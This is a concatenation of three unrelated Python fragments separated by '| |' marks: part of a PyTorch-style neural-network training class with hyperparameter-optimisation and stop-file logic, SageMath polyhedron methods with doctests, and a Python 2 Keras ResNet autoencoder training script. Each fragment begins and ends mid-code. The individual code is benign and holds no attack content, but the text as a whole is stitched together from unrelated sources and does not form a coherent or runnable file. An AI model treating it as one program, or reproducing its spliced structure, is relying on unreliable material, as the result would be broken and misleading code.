if isinstance(data, DataSetSharedMemoryA):
data.move_data_to_shared_memory(smm)
class SimpleAnnNet(
NodeANNDataElemInterface[nn.Module, CurrentNetData, _TypeBuffer, InitContainer],
abc.ABC
):
def __init__(self, args: InitNetArgs, /) -> None:
super().__init__()
self.__arguments_con = args
self.__data_container = _SimpleANNCon()
self.__savable: Optional[
NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]
] = None
self.__net_module: Optional[SimpleNetCon] = None
self.__data_name = "NotSet"
@final
def get_node_name(self) -> str:
return self.__data_name
@final
def set_node_name(self, name: str) -> None:
self.__data_name = name
@final
def _move_data_sets_to_shared_memory(self, smm: Optional[SharedMemoryManager], /) -> None:
if smm is not None:
_move_data_to_shared_mem(self.__data_container.train_data, smm)
_move_data_to_shared_mem(self.__data_container.eval_data, smm)
@abc.abstractmethod
def re_read_data(self, data_type: DataSetTypes, /) -> Optional[Tuple[Dataset, ...]]:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_net_state(self) -> NetGeneralState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_init_state(self) -> InitState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def get_truth_fun_id(self) -> str:
raise NotImplementedError("Abstract method!")
@final
def stop_file_it_min(self, it_cnt: int, runt_time_min: int, /) -> bool:
return (
it_cnt < self.arguments_con.hyper_optim_wr.stop_iterations
or not self.arguments_con.hyper_optim_wr.stop_iterations
) and (
self.stop_file is None
or (self.stop_file.exists() and self.stop_file.is_file())
) and (
runt_time_min < self.arguments_con.hyper_optim_wr.stop_time_min
or not self.arguments_con.hyper_optim_wr.stop_time_min
)
@final
@property
def stop_file(self) -> Optional[Path]:
return self.__data_container.stop_op_fp
@final
def stop_file_set(self, file_p: Optional[Path], /) -> None:
if file_p is not None and file_p.exists() and file_p.is_file():
self.__data_container.stop_op_fp = file_p
@final
@property
def arguments_con(self) -> InitNetArgs:
return self.__arguments_con
@final
def is_trainable(self) -> bool:
return self.retrain and not self.random_net
@final
@property
def retrain(self) -> bool:
return self.__data_container.is_trainable[0]
@final
def retrain_set(self, retrain: bool, /) -> None:
self.__data_container.is_trainable = (retrain, self.__data_container.is_trainable[1])
@final
@property
def random_net(self) -> bool:
return self.__data_container.is_trainable[1]
@final
def random_net_set(self, random_net: bool, /) -> None:
self.__data_container.is_trainable = (self.__data_container.is_trainable[0], random_net)
@final
@property
def test_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.test_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TEST)
if temp_data is not None:
self.test_data_set(temp_data)
return self.__data_container.test_data
@final
def test_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given test data set was empty")
self.__data_container.test_data = data
@final
@property
def train_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.train_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TRAIN)
if temp_data is not None:
self.train_data_set(temp_data)
return self.__data_container.train_data
@final
def train_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given train data set was empty")
self.__data_container.train_data = data
@final
@property
def eval_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.eval_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.EVAL)
if temp_data is not None:
self.eval_data_set(temp_data)
return self.__data_container.eval_data
@final
def eval_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given eval data set was empty")
self.__data_container.eval_data = data
@final
@property
def savable(self) -> \
Optional[NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]]:
return self.__savable
@final
def savable_set(self, savable: NetSavable[
nn.Module, CurrentNetData, _TypeBuffer, InitContainer
], /) -> None:
self.__savable = savable
@final
def get_savable_data(self) -> NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]:
if self.__savable is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__savable
@final
@property
def net_module(self) -> Optional[SimpleNetCon]:
return self.__net_module
@final
def net_module_set(self, module: SimpleNetCon, /) -> None:
if self.__net_module is not None:
raise KnownSimpleAnnError("Net was already initialised!")
self.__net_module = module
@final
def get_savable_net(self) -> SimpleNetCon:
if self.__net_module is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__net_module
@final
def _update_hyper_run(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
self.get_savable_net().reset_current_net()
self._update_hyper(hyper_cont, new_params)
@final
def _update_hyper(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
update_hyper_params(self.get_savable_net(), self.arguments_con, new_params)
update_hyper_container(self.arguments_con, hyper_cont)
@final
def _create_train_interface(self, id_file: ANNTreeIdType,
copy: bool, id_mod: str, /) -> TrainerInterfaceArgs:
if self.arguments_con.net_state.get_kwargs().redraw:
self.get_savable_net().redraw_current_net()
if copy:
buf = self.get_savable_net().remove_before_save()
new_mod = deepcopy(self.get_savable_net())
self.get_savable_net().reload_after_save(buf)
else:
new_mod = self.get_savable_net()
new_train_args = TrainerInterfaceArgs(
module=new_mod,
input_train=self.train_data,
input_eval=self.eval_data,
id_file=deepcopy(id_file),
dump=self.arguments_con.net_state.get_kwargs().dump,
cuda=self.arguments_con.net_state.get_kwargs().cuda,
optimizer=deepcopy(self.arguments_con.optimizer_wr)
if copy else self.arguments_con.optimizer_wr,
scheduler=deepcopy(self.arguments_con.scheduler_wr)
if copy else self.arguments_con.scheduler_wr,
criterion=deepcopy(self.arguments_con.criterion_wr)
if copy else self.arguments_con.criterion_wr,
truth_fun_id=self.get_truth_fun_id(),
hyper_str=create_hyper_param_str(self.get_node_name(), self.arguments_con)
)
if id_mod:
new_train_args.id_file.add_modifier(id_mod)
return new_train_args
@final
def _create_stop_file(self, id_file: ANNTreeIdType, /) -> Optional[Path]:
if self.arguments_con.hyper_optim_wr is not None \
and self.arguments_con.hyper_optim_wr.stop_file is not None \
and self.arguments_con.hyper_optim_wr.stop_file.exists() \
and self.arguments_con.hyper_optim_wr.stop_file.is_dir():
merged_str = \
f"{id_file.id_merged_str}_{datetime.now().strftime('%d_%m_%Y__%H_%M_%S')}.lock"
stop_file = self.arguments_con.hyper_optim_wr.stop_file.joinpath(merged_str)
stop_file.touch()
atexit.register(_unlink_if_exists, stop_file)
return stop_file
return None
def _get_new_params(self, generator_optim: HGenTA, fixed_params: _TrFitParam,
run_cont: _RunningConst, /) -> List[Dict[str, HyperOptimReturnElem]]:
run_cnt = 0
l_new_params: List[Dict[str, HyperOptimReturnElem]] = []
while run_cnt < 10 and not l_new_params:
run_cnt += 1
try:
l_new_params = generator_optim.send(fixed_params)
except StopIteration:
run_cont.running = False
run_cnt = 10
else:
run_cont.running = self.stop_file_it_min(run_cont.run_id, run_cont.run_time_min)
if not l_new_params:
run_cont.running = False
return l_new_params
def _train_single(self, sync_out: SyncStdoutInterface, run_cont: _RunningConst,
hyper_cont: HyperOptimInterfaceArgs,
id_file: ANNTreeIdType, /) -> Iterable[TrainNNStatsElementType]:
if self.arguments_con.hyper_optim_wr is None:
raise KnownSimpleAnnError("Hyper-optimiser is not defined!")
generator_optim = self.arguments_con.hyper_optim_wr.hyper.hyper_optim(
sync_out, hyper_cont
)
try:
l_new_params: List[Dict[str, HyperOptimReturnElem]] = next(generator_optim)
except StopIteration:
raise KnownSimpleAnnError("Generator could not be started!")
while run_cont.running:
tr_fit: _TrFitAl = ([], [])
trainer_args = []
for param_id, new_param in enumerate(l_new_params):
run_cont.hyper_cont_buffer = deepcopy(hyper_cont)
self.arguments_con.prepare_wr.init_prepare()
self._update_hyper_run(run_cont.hyper_cont_buffer, new_param)
yield from self.arguments_con.prepare_wr.prepare.run_train(
sync_out, PrepareInterfaceArgs(
trainer=deepcopy(self.arguments_con.trainer_wr.trainer),
trainer_args=self._create_train_interface(
id_file, False, str(run_cont.run_id + param_id)
)
)
)
re_copy_model(
self.arguments_con.prepare_wr.prepare.p_state_dict,
self.get_savable_net().get_net_com
)
tr_fit_res = self.arguments_con.prepare_wr.prepare.fitness
tr_fit[0].append((tr_fit_res[0], _create_hyper_params(run_cont.hyper_cont_buffer)))
tr_fit[1].append(tr_fit_res[1])
trainer_args.append(run_cont.hyper_cont_buffer)
self.get_savable_net().update_current_net(tr_fit_res[0])
run_cont.fit_plotter.update_fitness(tr_fit, trainer_args)
self._update_hyper(hyper_cont, run_cont.fit_plotter.bets_fit_h_param[1])
| |
if is_zero(Hvec*Vvec + Hconst):
incidence_matrix[Vindex, Hindex] = 1
# A ray or line is considered incident with a hyperplane,
# if it is orthogonal to the normal vector of the hyperplane.
for Vvec, Vindex in Vvectors_rays_lines:
if is_zero(Hvec*Vvec):
incidence_matrix[Vindex, Hindex] = 1
incidence_matrix.set_immutable()
return incidence_matrix
@cached_method
def slack_matrix(self):
r"""
Return the slack matrix.
The entries correspond to the evaluation of the Hrepresentation
elements on the Vrepresentation elements.
.. NOTE::
The columns correspond to inequalities/equations in the
order :meth:`Hrepresentation`, the rows correspond to
vertices/rays/lines in the order
:meth:`Vrepresentation`.
.. SEEALSO::
:meth:`incidence_matrix`.
EXAMPLES::
sage: P = polytopes.cube()
sage: P.slack_matrix()
[0 2 2 2 0 0]
[0 0 2 2 0 2]
[0 0 0 2 2 2]
[0 2 0 2 2 0]
[2 2 0 0 2 0]
[2 2 2 0 0 0]
[2 0 2 0 0 2]
[2 0 0 0 2 2]
sage: P = polytopes.cube(intervals='zero_one')
sage: P.slack_matrix()
[0 1 1 1 0 0]
[0 0 1 1 0 1]
[0 0 0 1 1 1]
[0 1 0 1 1 0]
[1 1 0 0 1 0]
[1 1 1 0 0 0]
[1 0 1 0 0 1]
[1 0 0 0 1 1]
sage: P = polytopes.dodecahedron().faces(2)[0].as_polyhedron()
sage: P.slack_matrix()
[1/2*sqrt5 - 1/2 0 0 1 1/2*sqrt5 - 1/2 0]
[ 0 0 1/2*sqrt5 - 1/2 1/2*sqrt5 - 1/2 1 0]
[ 0 1/2*sqrt5 - 1/2 1 0 1/2*sqrt5 - 1/2 0]
[ 1 1/2*sqrt5 - 1/2 0 1/2*sqrt5 - 1/2 0 0]
[1/2*sqrt5 - 1/2 1 1/2*sqrt5 - 1/2 0 0 0]
sage: P = Polyhedron(rays=[[1, 0], [0, 1]])
sage: P.slack_matrix()
[0 0]
[0 1]
[1 0]
TESTS::
sage: Polyhedron().slack_matrix()
[]
sage: Polyhedron(base_ring=QuadraticField(2)).slack_matrix().base_ring()
Number Field in a with defining polynomial x^2 - 2 with a = 1.41...
"""
if not self.n_Vrepresentation() or not self.n_Hrepresentation():
slack_matrix = matrix(self.base_ring(), self.n_Vrepresentation(),
self.n_Hrepresentation(), 0)
else:
Vrep_matrix = matrix(self.base_ring(), self.Vrepresentation())
Hrep_matrix = matrix(self.base_ring(), self.Hrepresentation())
# Getting homogeneous coordinates of the Vrepresentation.
hom_helper = matrix(self.base_ring(), [1 if v.is_vertex() else 0 for v in self.Vrepresentation()])
hom_Vrep = hom_helper.stack(Vrep_matrix.transpose())
slack_matrix = (Hrep_matrix * hom_Vrep).transpose()
slack_matrix.set_immutable()
return slack_matrix
def base_ring(self):
"""
Return the base ring.
OUTPUT:
The ring over which the polyhedron is defined. Must be a
sub-ring of the reals to define a polyhedron, in particular
comparison must be defined. Popular choices are
* ``ZZ`` (the ring of integers, lattice polytope),
* ``QQ`` (exact arithmetic using gmp),
* ``RDF`` (double precision floating-point arithmetic), or
* ``AA`` (real algebraic field).
EXAMPLES::
sage: triangle = Polyhedron(vertices = [[1,0],[0,1],[1,1]])
sage: triangle.base_ring() == ZZ
True
"""
return self.parent().base_ring()
def backend(self):
"""
Return the backend used.
OUTPUT:
The name of the backend used for computations. It will be one of
the following backends:
* ``ppl`` the Parma Polyhedra Library
* ``cdd`` CDD
* ``normaliz`` normaliz
* ``polymake`` polymake
* ``field`` a generic Sage implementation
EXAMPLES::
sage: triangle = Polyhedron(vertices = [[1, 0], [0, 1], [1, 1]])
sage: triangle.backend()
'ppl'
sage: D = polytopes.dodecahedron()
sage: D.backend()
'field'
sage: P = Polyhedron([[1.23]])
sage: P.backend()
'cdd'
"""
return self.parent().backend()
@cached_method
def center(self):
"""
Return the average of the vertices.
.. SEEALSO::
:meth:`representative_point`.
OUTPUT:
The center of the polyhedron. All rays and lines are
ignored. Raises a ``ZeroDivisionError`` for the empty
polytope.
EXAMPLES::
sage: p = polytopes.hypercube(3)
sage: p = p + vector([1,0,0])
sage: p.center()
(1, 0, 0)
"""
if self.dim() == 0:
return self.vertices()[0].vector()
else:
vertex_sum = vector(self.base_ring(), [0]*self.ambient_dim())
for v in self.vertex_generator():
vertex_sum += v.vector()
vertex_sum.set_immutable()
return vertex_sum / self.n_vertices()
@cached_method(do_pickle=True)
def centroid(self, engine='auto', **kwds):
r"""
Return the center of the mass of the polytope.
The mass is taken with respect to the induced Lebesgue measure,
see :meth:`volume`.
If the polyhedron is not compact, a ``NotImplementedError`` is
raised.
INPUT:
- ``engine`` -- either 'auto' (default), 'internal',
'TOPCOM', or 'normaliz'. The 'internal' and 'TOPCOM' instruct
this package to always use its own triangulation algorithms
or TOPCOM's algorithms, respectively. By default ('auto'),
TOPCOM is used if it is available and internal routines otherwise.
- ``**kwds`` -- keyword arguments that are passed to the
triangulation engine (see :meth:`triangulate`).
OUTPUT: The centroid as vector.
ALGORITHM:
We triangulate the polytope and find the barycenter of the simplices.
We add the individual barycenters weighted by the fraction of the total
mass.
EXAMPLES::
sage: P = polytopes.hypercube(2).pyramid()
sage: P.centroid()
(1/4, 0, 0)
sage: P = polytopes.associahedron(['A',2])
sage: P.centroid()
(2/21, 2/21)
sage: P = polytopes.permutahedron(4, backend='normaliz') # optional - pynormaliz
sage: P.centroid() # optional - pynormaliz
(5/2, 5/2, 5/2, 5/2)
The method is not implemented for unbounded polyhedra::
sage: P = Polyhedron(vertices=[(0,0)],rays=[(1,0),(0,1)])
sage: P.centroid()
Traceback (most recent call last):
...
NotImplementedError: the polyhedron is not compact
The centroid of an empty polyhedron is not defined::
sage: Polyhedron().centroid()
Traceback (most recent call last):
...
ZeroDivisionError: rational division by zero
TESTS::
sage: Polyhedron(vertices=[[0,1]]).centroid()
(0, 1)
"""
if not self.is_compact():
raise NotImplementedError("the polyhedron is not compact")
if self.n_vertices() == self.dim() + 1:
# The centroid of a simplex is its center.
return self.center()
triangulation = self.triangulate(engine=engine, **kwds)
if self.ambient_dim() == self.dim():
pc = triangulation.point_configuration()
else:
from sage.geometry.triangulation.point_configuration import PointConfiguration
A, b = self.affine_hull_projection(as_affine_map=True, orthogonal=True, orthonormal=True, extend=True)
pc = PointConfiguration((A(v.vector()) for v in self.Vrep_generator()))
barycenters = [sum(self.Vrepresentation(i).vector() for i in simplex)/(self.dim() + 1) for simplex in triangulation]
volumes = [pc.volume(simplex) for simplex in triangulation]
centroid = sum(volumes[i]*barycenters[i] for i in range(len(volumes)))/sum(volumes)
if self.ambient_dim() != self.dim():
# By the affine hull projection, the centroid has base ring ``AA``,
# we try return the centroid in a reasonable ring.
try:
return centroid.change_ring(self.base_ring().fraction_field())
except ValueError:
pass
return centroid
@cached_method
def representative_point(self):
"""
Return a "generic" point.
.. SEEALSO::
:meth:`center`.
OUTPUT:
A point as a coordinate vector. The point is chosen to be
interior as far as possible. If the polyhedron is not
full-dimensional, the point is in the relative interior. If
the polyhedron is zero-dimensional, its single point is
returned.
EXAMPLES::
sage: p = Polyhedron(vertices=[(3,2)], rays=[(1,-1)])
sage: p.representative_point()
(4, 1)
sage: p.center()
(3, 2)
sage: Polyhedron(vertices=[(3,2)]).representative_point()
(3, 2)
"""
accumulator = vector(self.base_ring(), [0]*self.ambient_dim())
for v in self.vertex_generator():
accumulator += v.vector()
accumulator /= self.n_vertices()
for r in self.ray_generator():
accumulator += r.vector()
accumulator.set_immutable()
return accumulator
def a_maximal_chain(self):
r"""
Return a maximal chain of the face lattice in increasing order.
EXAMPLES::
sage: P = polytopes.cube()
sage: P.a_maximal_chain()
[A -1-dimensional face of a Polyhedron in ZZ^3,
A 0-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 1 vertex,
A 1-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 2 vertices,
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 4 vertices,
A 3-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 8 vertices]
sage: P = polytopes.cube()
sage: chain = P.a_maximal_chain(); chain
[A -1-dimensional face of a Polyhedron in ZZ^3,
A 0-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 1 vertex,
A 1-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 2 vertices,
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 4 vertices,
A 3-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 8 vertices]
sage: [face.ambient_V_indices() for face in chain]
[(), (5,), (0, 5), (0, 3, 4, 5), (0, 1, 2, 3, 4, 5, 6, 7)]
TESTS::
Check output for the empty polyhedron::
sage: P = Polyhedron()
sage: P.a_maximal_chain()
[A -1-dimensional face of a Polyhedron in ZZ^0]
"""
comb_chain = self.combinatorial_polyhedron().a_maximal_chain()
from sage.geometry.polyhedron.face import combinatorial_face_to_polyhedral_face
empty_face = self.faces(-1)[0]
universe = self.faces(self.dim())[0]
if self.dim() == -1:
return [empty_face]
return [empty_face] + \
[combinatorial_face_to_polyhedral_face(self, face)
for face in comb_chain] + \
[universe]
@cached_method
def radius_square(self):
"""
Return the square of the maximal distance from the
:meth:`center` to a vertex. All rays and lines are ignored.
OUTPUT:
The square of the radius, which is | |
import tensorflow as tf
import numpy as np
import PIL as pil
import scipy
import skimage.measure
from keras.layers import Input, Dense, Conv2D, MaxPooling2D, UpSampling2D, Cropping2D, ZeroPadding2D, Convolution2D, Activation, AveragePooling2D, Flatten, Reshape
from keras.layers import Deconvolution2D as Conv2DTranspose
from keras.layers.normalization import BatchNormalization
from keras.applications.resnet50 import conv_block, identity_block
from keras.models import Model
from keras.optimizers import SGD, RMSprop
from keras import backend as K
from keras import regularizers
def pixel_weighted_loss(x_p,y):
x=x_p[:,:,:,:1]
weights=x_p[:,:,:,1:]
return K.mean(weights * K.square(y - x), axis=-1)
def mse_evbyev0(x,y):
return K.mean(K.square(y-x),axis=0)
def mse_evbyev1(x,y):
return K.mean(K.square(y-x),axis=1)
def mse_evbyev2(x,y):
return K.mean(K.square(y-x),axis=2)
def mse_evbyev3(x,y):
return K.mean(K.square(y-x),axis=3)
def mse_evbyev(x,y):
return K.mean(K.square(y-x),axis=(1,2,3))
def mse_evbyev_w(x_p,y):
x=x_p[:,:,:,:1]
weights=x_p[:,:,:,1:]
return K.mean(weights * K.square(y-x),axis=(1,2,3))
base_wh = 512
input_img = Input(shape=(base_wh, base_wh, 1)) # adapt this if using `channels_first` image data format
if True:
x = ZeroPadding2D((3, 3))(input_img)
print x.name, x.get_shape()
x = Convolution2D(64, 7, 7, subsample=(2, 2), name='conv1')(x)
print x.name, x.get_shape()
x = BatchNormalization(axis=3, name='bn_conv1')(x)
print x.name, x.get_shape()
x = Activation('relu')(x)
print x.name, x.get_shape()
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1))
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=2, block='c')
print x.name, x.get_shape()
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=3, block='d')
print x.name, x.get_shape()
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f')
print x.name, x.get_shape()
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c')
print x.name, x.get_shape()
x = AveragePooling2D((7, 7), name='avg_pool')(x)
print x.name, x.get_shape()
x = Flatten()(x)
print x.name, x.get_shape()
x = Dense(2*32*32)(x)
print x.get_shape()
encoded = x
#decoded = Reshape((32,32,2))(x)
x = Dense(2*2*2048)(x)
print x.name, x.get_shape()
x = Reshape((2,2,2048))(x)
print x.name, x.get_shape()
x = Conv2DTranspose(2048,1,1,(None,16,16,2048),subsample=(8,8))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [512, 512, 2048], strides=(1,1), stage=6, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=6, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=6, block='c')
print x.name, x.get_shape()
x = Conv2DTranspose(1024,1,1,(None,32,32,1024),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [256, 256, 1024], strides=(1,1), stage=7, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='d')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='e')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='f')
print x.name, x.get_shape()
x = Conv2DTranspose(512,1,1,(None,64,64,512),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [128, 128, 512], stage=8, strides=(1,1), block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=8, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=8, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=8, block='d')
print x.name, x.get_shape()
x = Conv2DTranspose(256,1,1,(None,128,128,256),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [64, 64, 256], stage=9, block='a', strides=(1, 1))
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=9, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=9, block='c')
print x.name, x.get_shape()
x = Conv2DTranspose(128,1,1,(None,256,256,128),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [32, 32, 128], stage=10, block='a', strides=(1, 1))
print x.name, x.get_shape()
x = identity_block(x, 3, [32, 32, 128], stage=10, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [32, 32, 128], stage=10, block='c')
print x.name, x.get_shape()
x = Conv2DTranspose(64,1,1,(None,512,512,64),subsample=(2,2))(x)
print x.name, x.get_shape()
x = ZeroPadding2D((3, 3))(x)
print x.name, x.get_shape()
x = Convolution2D(64, 7, 7, subsample=(1, 1), name='conv3')(x)
print x.name, x.get_shape()
x = ZeroPadding2D((3, 3))(x)
print x.name, x.get_shape()
x = Convolution2D(3, 7, 7, subsample=(1, 1), name='conv4')(x)
print x.name, x.get_shape()
x = ZeroPadding2D((3, 3))(x)
print x.name, x.get_shape()
x = Convolution2D(1, 7, 7, subsample=(1, 1), name='conv5')(x)
print x.name, x.get_shape()
#x = Activation('softmax')(x)
#print x.name, x.get_shape()
decoded = x
autoencoder = Model(input_img, decoded,)
autoencoder.compile(
#optimizer='adadelta',
optimizer=RMSprop(lr=0.0003),
#optimizer=SGD(lr=0.1, decay=1e-6, momentum=1.9),
#loss='mse',
#loss='binary_crossentropy',
loss=pixel_weighted_loss,
#metrics=[mse_evbyev,mse_evbyev1,mse_evbyev2,mse_evbyev3,mse_evbyev4]
metrics=[mse_evbyev_w]
)
def _parse_function(filename):
X=np.load(filename)['plane2'].reshape((1,))[0]
z00 = X.astype(np.float32).toarray().reshape((3456,1008,1));
while True:
i = np.random.randint(3456-base_wh)
j = np.random.randint(1008-base_wh)
z0 = z00[i:i+base_wh,j:j+base_wh,:]
if z0.max() > 0. or z0.min() < 0.: break
#print 'z0 shape:', z0.shape
z = z0
if z.max() > z.min(): z = (z0-np.min(z0))/(np.max(z0)-np.min(z0))
#zwh,edg = np.histogram(z0,bins=[0,1,13])
maxneg=-0.5
minpos=0.5
#print z0.min(),z0.max(),z0[z0<0.].shape,z0[z0>0.].shape
if z0.min()<0.: maxneg = np.max(z0[z0<0.])
if z0.max()>0.: minpos = np.min(z0[z0>0.])
zwh,edg = np.histogram(z0,bins=[-5000,maxneg/2,minpos/2,5000])
zwh=zwh.sum().astype(np.float32)/(zwh+1e-10)
zw = np.piecewise(z0,[(z0>=edg[i]-0.5)&(z0<edg[i+1]-0.5) for i in xrange(len(edg)-1)],zwh)
sumw = np.sum(zw) / zw.shape[0] / zw.shape[1]
return z, np.dstack([z,zw/sumw])
def randint(filename):
X=np.load(filename)['plane2'].reshape((1,))[0]
z00 = X.astype(np.float32).toarray().reshape((3456,1008,1));
i = np.random.randint(3456-base_wh)
j = np.random.randint(1008-base_wh)
while True:
z0 = z00[i:i+base_wh,j:j+base_wh,:]
if z0.max() > 0. or z0.min() < 0.: break
i = np.random.randint(3456-base_wh)
j = np.random.randint(1008-base_wh)
return (i, j)
def _parse_function_v(arg):
filename,(i,j) = arg
X=np.load(filename)['plane2'].reshape((1,))[0]
z0 = X.astype(np.float32).toarray().reshape((3456,1008,1));
z0 = z0[i:i+base_wh,j:j+base_wh,:]
z = z0
if z.max() > z.min(): z = (z0-np.min(z0))/(np.max(z0)-np.min(z0))
#zwh,edg = np.histogram(z0,bins=[0,1,13])
maxneg=-0.5
minpos=0.5
if z0.min()<0.: maxneg = np.max(z0[z0<0.])
if z0.max()>0.: minpos = np.min(z0[z0>0.])
zwh,edg = np.histogram(z0,bins=[-5000,maxneg/2,minpos/2,5000])
zwh=zwh.sum().astype(np.float32)/(zwh+1e-10)
zw = np.piecewise(z0,[(z0>=edg[i]-0.5)&(z0<edg[i+1]-0.5) for i in xrange(len(edg)-1)],zwh)
sumw = np.sum(zw) / zw.shape[0] / zw.shape[1]
return z, np.dstack([z,zw/sumw])
if False:
#z = (z0+4096.)/4096./2.
z = (z0-np.min(z0))/(np.max(z0)-np.min(z0))
zz = skimage.measure.block_reduce(z,(6,2),np.max)
zz2 = skimage.measure.block_reduce(z,(6,2),np.min)
zzm = skimage.measure.block_reduce(z,(6,2),np.mean)
zzw = skimage.measure.block_reduce(z0,(6,2),np.count_nonzero)
zzwh,edg = np.histogram(zzw,bins=[0,1,5,13])
zzwh = zzwh.sum().astype(np.float32)/(zzwh+1e-10)
#zzwh[0] = zzwh[0]/100.
zzw = zzw.astype(np.float32)
zzw = np.piecewise(zzw,[(zzw>=edg[i]-0.5)&(zzw<edg[i+1]-0.5) for i in xrange(len(edg)-1)],zzwh)
#zzw = v_reweight(x=zzw,hist=zzwh,bins=edg)
sumw = np.sum(zzw) / zzw.shape[0] / zzw.shape[1]
zzw = zzw / sumw
zz3 = np.dstack([zz,zz2,zzm])
zz4 = np.dstack([zz,zz2,zzm,zzw])
#return zz3,zz4
# A vector of filenames.
import os
filenames = ['output7/%s'%f for f in os.listdir('output7') if f.endswith('.npz') ]
valid_filenames = ['outputV/%s'%f for f in os.listdir('outputV') if f.endswith('.npz') ]
valid_starts = [randint(f) for f in valid_filenames]
np.random.shuffle(filenames)
epochs=350
steps_per_epoch=25
batch_size=4
valid_batch_size=4
valid_steps=640/valid_batch_size
min_mean_valid_loss = 1e10000
alllosses=[]
try:
for epoch in xrange(epochs):
for step in xrange(steps_per_epoch):
startev = (epoch * steps_per_epoch + step * batch_size) % len(filenames)
stopev = (epoch * steps_per_epoch + (step+1) * batch_size) % len(filenames)
if(startev > stopev):
a = filenames[startev:]
np.random.shuffle(filenames)
dataset=map(_parse_function,filenames[:stopev]+a)
else:
dataset=map(_parse_function,filenames[startev:stopev])
x,y = zip(*dataset)
loss = autoencoder.train_on_batch(np.stack(x),np.stack(y))
#print loss
#print loss[1].shape
#print loss[2].shape
#print loss[3].shape
#print loss[4].shape
#print loss[5].shape
#print len(y)
#print len(dataset)
#print np.stack(y).shape
#raise Exception
#print epoch, step, loss
mean_valid_loss = 0.;
alllosses=[]
for step in xrange(valid_steps):
startev = (step * valid_batch_size) % len(valid_filenames)
stopev = ((step+1) * valid_batch_size) % len(valid_filenames)
if(startev > stopev):
dataset=map(_parse_function_v,zip(valid_filenames[:stopev]+valid_filenames[startev:],valid_starts[:stopev]+valid_starts[startev:]))
else:
dataset=map(_parse_function_v,zip(valid_filenames[startev:stopev],valid_starts[startev:stopev]))
x,y = zip(*dataset)
losses=autoencoder.test_on_batch(np.stack(x),np.stack(y))
mean_valid_loss+=losses[0]
alllosses+=[losses[1]]
print epoch,'VALID',mean_valid_loss/valid_steps#,alllosses
if mean_valid_loss < min_mean_valid_loss:
